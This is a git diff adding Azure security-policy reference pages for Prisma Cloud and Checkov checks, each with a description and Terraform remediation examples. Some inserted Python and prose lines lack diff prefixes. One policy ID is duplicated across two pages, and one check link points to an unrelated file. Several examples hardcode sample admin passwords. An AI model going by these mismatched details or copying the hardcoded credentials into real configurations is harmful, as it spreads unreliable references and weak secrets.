b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc @@ -0,0 +1,107 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) is disabled +// Azure SQL Server ADS Vulnerability Assessment (VA) disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8806a20a-d0dd-43f5-8e17-a1bd772bdfed + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml[CKV2_AZURE_2] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Vulnerability Assessment (VA) service scans for 
critical SQL servers and corresponding SQL databases.
+Enabling Azure Defender for SQL server does not enable the Vulnerability Assessment capability for individual SQL databases unless a storage account is set to store the scanning data and reports.
+The Vulnerability Assessment service scans databases for known security vulnerabilities and highlights deviations from best practices, such as misconfigurations, excessive permissions, and unprotected sensitive data.
+Results of the scan include actionable steps to resolve each issue and provide customized remediation scripts where applicable.
+Additionally, an assessment report can be customized by setting an acceptable baseline for permission configurations, feature configurations, and database settings.
+We recommend you ensure Vulnerability Assessment is enabled on a SQL server by setting a Storage Account.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment
+
+
+[source,go]
+----
+resource "azurerm_resource_group" "okExample" {
+  name     = "okExample-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_sql_server" "okExample" {
+  name                         = "mysqlserver"
+  resource_group_name          = azurerm_resource_group.okExample.name
+  location                     = azurerm_resource_group.okExample.location
+  version                      = "12.0"
+  administrator_login          = "4dm1n157r470r"
+  administrator_login_password = "4-v3ry-53cr37-p455w0rd"
+}
+
+resource "azurerm_storage_account" "okExample" {
+  name                     = "accteststorageaccount"
+  resource_group_name      = azurerm_resource_group.okExample.name
+  location                 = azurerm_resource_group.okExample.location
+  account_tier             = "Standard"
+  account_replication_type = "GRS"
+}
+
+resource "azurerm_storage_container" "okExample" {
+  name                  = "accteststoragecontainer"
+  storage_account_name  = azurerm_storage_account.okExample.name
+  container_access_type = "private"
+}
+
+resource "azurerm_mssql_server_security_alert_policy" "okExample" {
+  resource_group_name = azurerm_resource_group.okExample.name
+  server_name         = azurerm_sql_server.okExample.name
+  state               = "Enabled"
+}
+
+resource "azurerm_mssql_server_vulnerability_assessment" "okExample" {
+  server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id
+  storage_container_path          = "${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/"
+  storage_account_access_key      = azurerm_storage_account.okExample.primary_access_key
+
+  recurring_scans {
+    enabled                   = true
+    email_subscription_admins = true
+    emails = [
+      "email@example1.com",
+      "email@example2.com"
+    ]
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable.adoc
new file mode 100644
index 000000000..92bc0be56
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable.adoc
@@ -0,0 +1,94 @@
+== Azure Key Vault is not recoverable
+// Azure Key Vault not recoverable
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6c9c2a98-811f-4a04-8202-51285308bad9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py[CKV_AZURE_42]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+The key vault contains objects such as keys, secrets and certificates.
+Accidental unavailability of a key vault can cause immediate data loss or loss of security functions supported by the key vault objects, such as authentication, validation, verification, and non-repudiation.
+Deleting or purging a key vault leads to immediate loss of the keys that encrypt data in dependent services, such as storage accounts and SQL databases, as well as of the other objects the key vault provides, such as secrets and certificates.
+We recommend you make the key vault recoverable by enabling the *Do Not Purge* and *Soft Delete* functions.
+This prevents accidental deletion by a user running the delete/purge command on the key vault, as well as deliberate deletion by an attacker or malicious user seeking to cause disruption.
+////
+=== Fix - Runtime
+
+
+*Procedure*
+
+
+There are two key vault properties that play roles in the permanent unavailability of a key vault.
+
+. *EnablePurgeProtection*: *enableSoftDelete* only ensures that the key vault is not deleted permanently and is recoverable for 90 days from the date of deletion.
++
+There are scenarios where a key vault and/or its objects that are accidentally purged will not be recoverable.
++
+Setting *enablePurgeProtection* to "true" ensures the key vault and its objects cannot be purged.
++
+Enabling both parameters on key vaults ensures that key vaults and their objects cannot be deleted/purged permanently.
+
+. *SetSoftDeleteRetentionDays (Optional)*: Set the number of days that items should be retained for once soft-deleted.
++
+This value can be between 7 and 90 (the default) days.
+
+
+*Azure Portal*: The Azure Portal does not currently have provision to update the respective configurations.
+
+
+
+
+*CLI Command*
+
+
+Use the following command:
+----
+az resource update
+--id /subscriptions/xxxxxx-xxxx-xxxx-xxxxxxxxxxxxxxxx/resourceGroups/
+<resourceGroupName>/providers/Microsoft.KeyVault/vaults/<keyVaultName>
+--set properties.enablePurgeProtection=true properties.enableSoftDelete=true
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_key_vault
+* *Arguments:* purge_protection_enabled, soft_delete_retention_days
+
+
+[source,go]
+----
+resource "azurerm_key_vault" "example" {
+  ...
++ purge_protection_enabled   = true
++ soft_delete_retention_days = 7 # Default is 90
+}
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-virtual-machines-are-utilizing-managed-disks.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-virtual-machines-are-utilizing-managed-disks.adoc
new file mode 100644
index 000000000..014ea9dcf
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-virtual-machines-are-utilizing-managed-disks.adoc
@@ -0,0 +1,98 @@
+== Azure Virtual Machines does not utilise Managed Disks
+// Azure Virtual Machines does not use Managed Disks
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a7e903d3-c051-48ec-acae-c4ce21362155
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml[CKV2_AZURE_9]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Migrate BLOB based VHDs to Managed Disks on Virtual Machines to exploit the default features of this configuration.
+The features include:
+
+. Default Disk Encryption
+
+. Resilience, as Microsoft will manage the disk storage and move it if the underlying hardware goes faulty
+
+. Reduction of costs over storage accounts
++
+Managed disks are by default encrypted on the underlying hardware, so no additional encryption is required for basic protection; additional encryption is available if required.
++
+Managed disks are by design more resilient than storage accounts.
++
+For ARM-deployed Virtual Machines, Azure Advisor will at some point recommend moving VHDs to managed disks, both from a security and a cost management perspective.
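The build-time detection for this policy boils down to an attribute test on each VM's OS-disk block. As a rough illustration only (Checkov's actual CKV2_AZURE_9 check is a YAML-based graph check, and the helper below is hypothetical), the logic can be sketched in Python:

```python
# Hypothetical sketch of the managed-disk detection logic; Checkov's real
# CKV2_AZURE_9 check is a YAML graph check, not this function.

def uses_managed_disks(vm_resource: dict) -> bool:
    """Return True when every OS-disk block sets managed_disk_type
    rather than a blob-based vhd_uri."""
    disks = vm_resource.get("storage_os_disk", [])
    if isinstance(disks, dict):
        disks = [disks]
    if not disks:
        return False
    return all("managed_disk_type" in d and "vhd_uri" not in d for d in disks)

managed = {"storage_os_disk": {"name": "osdisk",
                               "managed_disk_type": "Standard_LRS"}}
blob_based = {"storage_os_disk": {"name": "osdisk",
                                  "vhd_uri": "https://acct.blob.core.windows.net/vhds/os.vhd"}}
print(uses_managed_disks(managed))     # True
print(uses_managed_disks(blob_based))  # False
```

A VM with no disk definition at all is treated as failing, mirroring the conservative behavior a policy check would want.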
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_virtual_machine
+
+
+[source,go]
+----
+resource "azurerm_virtual_machine" "virtual_machine_good" {
+  name                  = "my-vm"
+  location              = "location"
+  resource_group_name   = "group_name"
+  network_interface_ids = ["1234567"]
+  vm_size               = "Standard_DS1_v2"
+
+  storage_image_reference {
+    publisher = "Canonical"
+    offer     = "UbuntuServer"
+    sku       = "16.04-LTS"
+    version   = "latest"
+  }
+
+  storage_os_disk {
+    name              = "myosdisk1"
+    caching           = "ReadWrite"
+    create_option     = "FromImage"
+    managed_disk_type = "Standard_LRS"
+  }
+
+  os_profile {
+    computer_name  = "hostname"
+    admin_username = "testadmin"
+    admin_password = "Password1234!"
+  }
+
+  os_profile_linux_config {
+    disable_password_authentication = false
+  }
+
+  tags = {
+    environment = "staging"
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/set-an-expiration-date-on-all-keys.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/set-an-expiration-date-on-all-keys.adoc
new file mode 100644
index 000000000..a1697f429
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/set-an-expiration-date-on-all-keys.adoc
@@ -0,0 +1,118 @@
+== Azure Key Vault Keys do not have expiration date
+// Azure Key Vault Keys do not have expiration date
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 13ce71fb-8b1a-46bc-8302-ec3cc67a49b5
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyExpirationDate.py[CKV_AZURE_40]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+////
+Bridgecrew
+Prisma Cloud
+*Azure Key Vault Keys do not have expiration date*
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 13ce71fb-8b1a-46bc-8302-ec3cc67a49b5
+
+|Checkov Check ID
+|
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyExpirationDate.py[CKV_AZURE_40]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+////
+
+=== Description
+
+
+The Azure Key Vault enables users to store and use cryptographic keys within the Microsoft Azure environment.
+The exp (expiration time) attribute identifies the expiration time on or after which the key *must not* be used for a cryptographic operation.
+Keys are not set to expire by default.
+We recommend you rotate keys in the key vault and set an explicit expiration time for all keys in the Azure Key Vault.
+This ensures that the keys cannot be used beyond their assigned lifetimes.
+////
+=== Fix - Runtime
+
+
+*Azure Portal* To change the policy using the Azure Portal, follow these steps:
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *Key vaults*.
+
+. For each Key vault: a) Click *Keys*.
++
+b) Navigate to the *Settings* section.
++
+c) Set *Enabled?* to *Yes*.
++
+d) Set an appropriate *EXPIRATION DATE* on all keys.
+
+
+*CLI Command*
+
+
+To update the *EXPIRATION DATE* for the key, use the following command:
+----
+az keyvault key set-attributes
+--name <keyName>
+--vault-name <vaultName>
+--expires Y-m-d'T'H:M:S'Z'
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_key_vault_key
+* *Arguments:* expiration_date
+
+
+[source,go]
+----
+resource "azurerm_key_vault_key" "generated" {
+  ...
++ expiration_date = "2020-12-30T20:00:00Z"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/azure-iam-policies.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/azure-iam-policies.adoc
new file mode 100644
index 000000000..a105f7853
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/azure-iam-policies.adoc
@@ -0,0 +1,49 @@
+== Azure IAM Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-azr-iam-1.adoc[App Service is not registered with an Azure Active Directory account]
+| https://github.com/bridgecrewio/checkov/blob/40f5920217f6200cc36bc4dba8c08f5af4ae6d26/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_16]
+|MEDIUM
+
+
+|xref:do-not-create-custom-subscription-owner-roles.adoc[Azure subscriptions with custom roles does not have minimum permissions]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py[CKV_AZURE_39]
+|HIGH
+
+
+|xref:ensure-azure-acr-admin-account-is-disabled.adoc[Azure ACR admin account is enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py[CKV_AZURE_137]
+|LOW
+
+
+|xref:ensure-azure-acr-disables-anonymous-image-pulling.adoc[Azure ACR enables anonymous image pulling]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py[CKV_AZURE_138]
+|LOW
+
+
+|xref:ensure-azure-cosmosdb-has-local-authentication-disabled.adoc[Azure CosmosDB does not have Local Authentication disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py[CKV_AZURE_140]
+|LOW
+
+
+|xref:ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc[Azure Kubernetes Service (AKS) local
admin account is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py[CKV_AZURE_141] +|LOW + + +|xref:ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc[Azure Machine Learning Compute Cluster Local Authentication is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLCCLADisabled.py[CKV_AZURE_142] +|LOW + + +|xref:ensure-azure-windows-vm-enables-encryption.adoc[Azure Windows VM does not enable encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py[CKV_AZURE_151] +|LOW + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/bc-azr-iam-1.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/bc-azr-iam-1.adoc new file mode 100644 index 000000000..2d95e5903 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/bc-azr-iam-1.adoc @@ -0,0 +1,91 @@ +== App Service is not registered with an Azure Active Directory account +// App Service not registered with an Azure Active Directory account + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8d57d7e0-d820-457b-a355-b9874e475191 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/40f5920217f6200cc36bc4dba8c08f5af4ae6d26/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_16] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Managed service identity in *App Service* increases security by eliminating secrets from the app, for example, credentials in the connection strings. +*App Service* provides a highly-scalable, self-patching web hosting service in Azure. 
+It also provides a managed identity for apps, which is a turn-key solution for securing access to an Azure SQL Database and other Azure services.
+We recommend you register the *App Service* with your Azure Active Directory account, ensuring the app can connect securely to other Azure services without the need for usernames and passwords.
+////
+=== Fix - Runtime
+
+
+*Azure Portal* To change the policy using the Azure Portal, follow these steps:
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *App Services*.
+
+. For each App, click the App.
++
+a) Navigate to the *Setting* section.
++
+b) Click *Identity*.
++
+c) Set *Status* to *On*.
+
+
+*CLI Command*
+
+
+To set the *Register with Azure Active Directory* feature for an existing app, use the following command:
+----
+az webapp identity assign
+--resource-group <RESOURCE_GROUP_NAME>
+--name <APP_NAME>
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Field:* identity
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ identity {
++   type         = "UserAssigned"
++   identity_ids = ["12345"]
++ }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/do-not-create-custom-subscription-owner-roles.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/do-not-create-custom-subscription-owner-roles.adoc
new file mode 100644
index 000000000..bd307c368
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/do-not-create-custom-subscription-owner-roles.adoc
@@ -0,0 +1,143 @@
+== Azure subscriptions with custom roles does not have minimum permissions
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c5aef549-9d4c-4217-a45f-19a9de8b3502
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py[CKV_AZURE_39]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+// ,Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+////
+Bridgecrew
+Prisma Cloud
+*Azure subscriptions with custom roles does not have minimum permissions*
+
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+
+|===
+|Prisma Cloud Policy ID
+| c5aef549-9d4c-4217-a45f-19a9de8b3502
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py[CKV_AZURE_39]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+////
+
+=== Description
+
+
+Subscription ownership should not include permission to create custom owner roles.
+The principle of least privilege should be followed, with only the necessary privileges assigned instead of allowing full administrative access.
+Classic subscription admin roles offer basic access management and include Account Administrator, Service Administrator, and Co-Administrators.
+We recommend the minimum permissions necessary be given to subscription owner accounts initially.
+Permissions can be added as needed by the account holder.
+This ensures the account holder cannot perform actions which were not intended.
+////
+=== Fix - Runtime
+
+
+*CLI Command*
+
+
+To provide a list of the roles identified, use the following command: `az role definition list`
+Check for entries with an *assignableScope* of */* or a *subscription*, and an action of `*`.
+To verify the usage and impact of removing the role identified, use the following command: `az role definition delete --name "rolename"`
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+*Option 1*
+
+
+* *Resource:* azurerm_role_definition
+* *Arguments:* actions
+
+
+[source,go]
+----
+resource "azurerm_role_definition" "example" {
+  name        = "my-custom-role"
+  scope       = data.azurerm_subscription.primary.id
+  description = "This is a custom role created via Terraform"
+
+  permissions {
+    actions = [
+-     "*"
+    ]
+    not_actions = []
+  }
+
+  assignable_scopes = [
+    "/"
+  ]
+}
+----
+
+
+*Option 2*
+
+
+* *Resource:* azurerm_role_definition
+* *Arguments:* assignable_scopes
+
+
+[source,go]
+----
+resource "azurerm_role_definition" "example" {
+  name        = "my-custom-role"
+  scope       = data.azurerm_subscription.primary.id
+  description = "This is a custom role created via Terraform"
+  permissions {
+    actions = [
+      "*"
+    ]
+    not_actions = []
+  }
+
+  assignable_scopes = [
+-   "/"
++   data.azurerm_subscription.primary.id
+  ]
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-admin-account-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-admin-account-is-disabled.adoc
new file mode 100644
index 000000000..3441b1def
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-admin-account-is-disabled.adoc
@@ -0,0 +1,54 @@
+== Azure ACR admin account is enabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1bd00a0d-831d-4145-a986-59999733b079
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py[CKV_AZURE_137]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling the admin account for your Azure Container Registry (ACR) can help improve the security of your registry.
+The admin account has full access to all resources within the registry, and can make any changes to the registry and its contents.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_container_registry
+* *Arguments:* admin_enabled
+
+
+[source,go]
+----
+resource "azurerm_container_registry" "ckv_unittest_pass" {
+  name                = "containerRegistry1"
+  resource_group_name = azurerm_resource_group.rg.name
+  location            = azurerm_resource_group.rg.location
+  admin_enabled       = false
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-disables-anonymous-image-pulling.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-disables-anonymous-image-pulling.adoc
new file mode 100644
index 000000000..d69db78d4
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-disables-anonymous-image-pulling.adoc
@@ -0,0 +1,55 @@
+== Azure ACR enables anonymous image pulling
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a51f0c50-9178-413b-b23a-e21cd8f8e28b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py[CKV_AZURE_138]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling anonymous image pulling for your Azure Container Registry (ACR) can help improve the security of your registry.
+When anonymous image pulling is enabled, anyone can pull images from your registry without needing to authenticate or have authorization.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_container_registry
+* *Arguments:* anonymous_pull_enabled
+
+
+[source,go]
+----
+resource "azurerm_container_registry" "ckv_unittest_pass_1" {
+  name                   = "containerRegistry1"
+  resource_group_name    = azurerm_resource_group.rg.name
+  location               = azurerm_resource_group.rg.location
+  sku                    = "Premium"
+  anonymous_pull_enabled = false
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-cosmosdb-has-local-authentication-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-cosmosdb-has-local-authentication-disabled.adoc
new file mode 100644
index 000000000..e952053d3
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-cosmosdb-has-local-authentication-disabled.adoc
@@ -0,0 +1,64 @@
+== Azure CosmosDB does not have Local Authentication disabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1bd00a0d-831d-4145-a986-59999733b079
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py[CKV_AZURE_140]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling local authentication for Azure CosmosDB can help improve the security of your database.
+Local authentication allows users to access the database using a local account and password, rather than an Azure Active Directory (Azure AD) account.
+By disabling local authentication, you can ensure that all users must authenticate using an Azure AD account.
+This can help prevent unauthorized access to the database and protect against potential security threats such as data breaches.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_cosmosdb_account
+* *Arguments:* local_authentication_disabled
+
+
+[source,go]
+----
+resource "azurerm_cosmosdb_account" "pass" {
+  name                          = "pike-sql"
+  location                      = "uksouth"
+  resource_group_name           = "pike"
+  offer_type                    = "Standard"
+  kind                          = "GlobalDocumentDB"
+  local_authentication_disabled = true
+  enable_free_tier              = true
+
+  consistency_policy {
+    consistency_level       = "Session"
+    max_interval_in_seconds = 5
+    max_staleness_prefix    = 100
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc
new file mode 100644
index 000000000..9857267ad
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc
@@ -0,0 +1,77 @@
+== Azure Kubernetes Service (AKS) local admin account is enabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 56b6a6d8-283f-4847-9fbc-7b93987117c4
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py[CKV_AZURE_141]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling the local admin account for your Azure Kubernetes Service (AKS) cluster can help improve the security of your cluster.
+The local admin account has full access to all resources within the cluster, and can make any changes to the cluster and its contents.
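For clusters that are already deployed, the same condition can be verified from CLI output. A minimal sketch, assuming the `disableLocalAccounts` field name from the `az aks show -o json` managed-cluster payload (the helper function itself is hypothetical):

```python
import json

# Hypothetical helper: inspect `az aks show -o json` output and report whether
# local accounts are disabled. The `disableLocalAccounts` field name is an
# assumption based on the AKS managed-cluster schema.

def local_admin_disabled(aks_show_output: str) -> bool:
    """Return True when the cluster JSON reports local accounts disabled."""
    cluster = json.loads(aks_show_output)
    return cluster.get("disableLocalAccounts", False) is True

sample = json.dumps({"name": "example-aks1", "disableLocalAccounts": True})
print(local_admin_disabled(sample))                              # True
print(local_admin_disabled(json.dumps({"name": "legacy-aks"})))  # False
```

A cluster that omits the field entirely is treated as non-compliant, which matches the fail-closed stance a security audit would take.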
+
+//=== Fix - Runtime
+
+
+//*CLI Command*
+
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_kubernetes_cluster
+* *Arguments:* local_account_disabled
+
+
+[source,go]
+----
+resource "azurerm_kubernetes_cluster" "ckv_unittest_pass" {
+  name                   = "example-aks1"
+  location               = azurerm_resource_group.example.location
+  resource_group_name    = azurerm_resource_group.example.name
+  local_account_disabled = true
+
+  default_node_pool {
+    name       = "default"
+    node_count = 1
+    vm_size    = "Standard_D2_v2"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Environment = "Production"
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc
new file mode 100644
index 000000000..e1a8aa3e0
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc
@@ -0,0 +1,74 @@
+== Azure Machine Learning Compute Cluster Local Authentication is enabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2ef37402-74b8-450f-887b-1fe6db41eb8e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLCCLADisabled.py[CKV_AZURE_142]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling local authentication for Azure Machine Learning Compute Clusters can help improve the security of your clusters.
+Local authentication allows users to access the cluster using a local account and password, rather than an Azure Active Directory (Azure AD) account.
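An audit of this kind can be run across several compute-cluster definitions at once. A minimal sketch, assuming the cluster blocks have already been parsed into dicts and that a missing `local_auth_enabled` attribute counts as enabled (the azurerm provider's default, assumed here):

```python
# Hypothetical batch audit over parsed compute-cluster blocks: list the
# clusters that still allow local authentication. A missing
# local_auth_enabled attribute is treated as enabled (assumed provider default).

def clusters_with_local_auth(clusters: dict) -> list:
    """Return names of compute clusters that still allow local authentication."""
    return [name for name, cfg in clusters.items()
            if cfg.get("local_auth_enabled", True)]

clusters = {
    "ok":  {"vm_size": "Standard_DS2_v2", "local_auth_enabled": False},
    "bad": {"vm_size": "Standard_DS2_v2"},
}
print(clusters_with_local_auth(clusters))  # ['bad']
```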
+
+//=== Fix - Runtime
+
+
+//*CLI Command*
+
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_machine_learning_compute_cluster
+* *Arguments:* local_auth_enabled
+
+
+[source,go]
+----
+resource "azurerm_machine_learning_compute_cluster" "ckv_unittest_pass" {
+  name                          = "example"
+  location                      = "West Europe"
+  vm_priority                   = "LowPriority"
+  vm_size                       = "Standard_DS2_v2"
+  machine_learning_workspace_id = azurerm_machine_learning_workspace.example.id
+  local_auth_enabled            = false
+
+  scale_settings {
+    min_node_count                       = 0
+    max_node_count                       = 1
+    scale_down_nodes_after_idle_duration = "PT30S" # 30 seconds
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
+----
+
